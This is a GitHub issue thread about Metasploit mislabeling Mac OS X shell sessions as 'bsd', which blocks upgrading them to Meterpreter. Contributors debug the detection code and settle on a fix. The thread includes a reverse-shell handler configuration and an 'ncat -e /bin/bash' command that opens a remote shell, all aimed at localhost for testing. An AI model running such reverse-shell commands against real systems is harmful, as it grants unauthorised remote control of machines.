### ISSUE TITLE
Mac OS X shell detected as bsd

### ISSUE THREAD

**Issue by psychomario** [rapid7/metasploit-framework#6359]
Mac OS X 10.10.4 is detected as bsd when using the following rcfile and reverse shell. This causes `sessions -u` to fail, but can be fixed manually.

```
use multi/handler
set payload generic/shell_reverse_tcp
set LHOST 127.0.0.1
set ExitOnSession False
exploit -z -j
```

```
ncat -e /bin/bash 127.0.0.1 4444
```

```
msf exploit(handler) > sessions -l

Active sessions
===============

  Id  Type       Information  Connection
  --  ----       -----------  ----------
  1   shell bsd               127.0.0.1:4444 -> 127.0.0.1:49489 (127.0.0.1)

msf exploit(handler) > sessions -u 1
[*] Executing 'post/multi/manage/shell_to_meterpreter' on session(s): [1]

[*] Upgrading session ID: 1
[-] Shells on the the target platform, bsd, cannot be upgraded to Meterpreter at this time.


msf exploit(handler) > irb -e 'framework.sessions[1].platform="osx"'


msf exploit(handler) > sessions -u 1
[*] Executing 'post/multi/manage/shell_to_meterpreter' on session(s): [1]

[*] Upgrading session ID: 1
[*] Starting exploit/multi/handler
[*] Started reverse handler on 127.0.0.1:4433
[*] Starting the payload handler...
[*] Sending stage (37475 bytes) to 127.0.0.1
[*] Meterpreter session 2 opened (127.0.0.1:4433 -> 127.0.0.1:49507) at 2015-12-16 10:31:35 +0000
```

If someone can point me towards the detection location I can try to fix it and submit a PR.

**Comment by wchen-r7** [comment]
The session detection code is here:
https://github.com/rapid7/metasploit-framework/blob/db788d1b7cd9db4760523fd3fc6fd3981e6acbea/modules/post/multi/manage/shell_to_meterpreter.rb#L78

And it looks like whoever wrote it forgot to account for the OS X platform, and this causes that platform to be blank, and that's why you hit that error. So I what you can do is, in the ```else``` clause (starting line 95), you can add more code to check OS X.

I'll let you have the fun first, but if you change your mind, let me know, I can grab this problem too :-)

**Comment by psychomario** [comment]
I think the issue is before this point, becuase osx is usedhere: https://github.com/rapid7/metasploit-framework/blob/db788d1b7cd9db4760523fd3fc6fd3981e6acbea/modules/post/multi/manage/shell_to_meterpreter.rb#L86

I think it's wherever session.platform is set when the session is connected, as it shows bsd in the `sessions -l` output.

**Comment by wchen-r7** [comment]
@psychomario Hmmm I actually can't reproduce this problem:

```
msf > use exploit/multi/handler 
msf exploit(handler) > set payload generic/shell_reverse_tcp
payload => generic/shell_reverse_tcp
msf exploit(handler) > set lhost 192.168.1.199
lhost => 192.168.1.199
msf exploit(handler) > set exitonsession false
exitonsession => false
msf exploit(handler) > run -j
[*] Exploit running as background job.

[*] Started reverse handler on 192.168.1.199:4444 
msf exploit(handler) > [*] Starting the payload handler...
[*] Command shell session 1 opened (192.168.1.199:4444 -> 192.168.1.199:54474) at 2015-12-19 12:29:34 -0600

msf exploit(handler) > sessions -l

Active sessions
===============

  Id  Type       Information  Connection
  --  ----       -----------  ----------
  1   shell bsd               192.168.1.199:4444 -> 192.168.1.199:54474 (192.168.1.199)

msf exploit(handler) > sessions -u 1
[*] Executing 'post/multi/manage/shell_to_meterpreter' on session(s): [1]

[*] Upgrading session ID: 1
[*] Starting exploit/multi/handler
[*] Started reverse handler on 192.168.1.199:4433 
[*] Starting the payload handler...
[*] Sending stage (37475 bytes) to 192.168.1.199
[*] Meterpreter session 2 opened (192.168.1.199:4433 -> 192.168.1.199:54475) at 2015-12-19 12:30:06 -0600
msf exploit(handler) >
```

I am on OS X 10.11.2

**Comment by psychomario** [comment]
That's odd, as your platform is still being detected as bsd (sessions output). I can't get to my mac until monday to work out what the difference is.

**Comment by timwr** [comment]
Despite the bsd label it should fall back to the python meterpreter here:
https://github.com/rapid7/metasploit-framework/blob/master/modules/post/multi/manage/shell_to_meterpreter.rb#L104 
perhaps the ```python -V``` command is failing? Try ```setg VERBOSE true``` so you can see the output of vprint_status?
If you're sending a pr you can always fix **the the** typo here: https://github.com/rapid7/metasploit-framework/blob/master/modules/post/multi/manage/shell_to_meterpreter.rb#L115

**Comment by psychomario** [comment]
I'll take a look tomorrow when I can get to my mac. I do seem to remember the output to python -V appearing on the ncat end so perhaps it's a stderr issue.

**Comment by psychomario** [comment]
`setg VERBOSE true` didn't seem to make any difference, the output was the same as before.
```
10.240.28.203 1 1  exploit(handler) ➤ sessions -u 1
[*] Executing 'post/multi/manage/shell_to_meterpreter' on session(s): [1]

[*] Upgrading session ID: 1
[*] Upgrade payload:
[-] Shells on the the target platform, bsd, cannot be upgraded to Meterpreter at this time.
10.240.28.203 1 1  exploit(handler) ➤
```
As for the `ncat` connectback, here is the output:
```
[8:45][MacBook-Pro-2]
I   ➤  ncat -e /bin/bash localhost 4444
uname: illegal option -- o
usage: uname [-amnprsv]
Python 2.7.10
uname: illegal option -- o
usage: uname [-amnprsv]
Python 2.7.10
```

This implies it's getting to [L96](https://github.com/rapid7/metasploit-framework/blob/master/modules/post/multi/manage/shell_to_meterpreter.rb#L96), when it should be caught by [L86](https://github.com/rapid7/metasploit-framework/blob/master/modules/post/multi/manage/shell_to_meterpreter.rb#L86)

**Comment by psychomario** [comment]
We could do
```
if cmd_exec('uname') =~ /Darwin/i
   ...python...
end
```
But I think it would be better to make sure that `session.platform` is set right.

**Comment by timwr** [comment]
That would fix it, feel free to send a pr as I don't have an OSX box to test on at the moment :(
Looks like uname -o option isn't available on OSX, which clogs up the shell with stderr, causing the next one to fail, seems like an annoying bug with cmd_exec on a shell session.
```uname -ms``` should work on both, e.g:
https://github.com/timwr/metasploit-framework/compare/master...timwr:issue-6359?expand=1
p.s If you do ```set payload osx/x86/shell_reverse_tcp``` session.platform will be set correctly and you won't see this issue.
p.p.s Use set LHOST 0.0.0.0 not 127.0.0.1, 127.0.0.1 sometimes causes problems because it's a reserved address.

**Comment by psychomario** [comment]
So with your PR, we don't get an error any more. It turns out `python -V` outputs to stderr rather than stdout. The way I see it we have two options:

Change `python -V` to `python -V 2>&1`. I have tested and this works fine.

Add an `elsif`: `elsif target_info =~ /Darwin/i` as above.

Whichever you think is the most suitable fix I can implement and PR.

**Comment by psychomario** [comment]
Implemented both as #6381
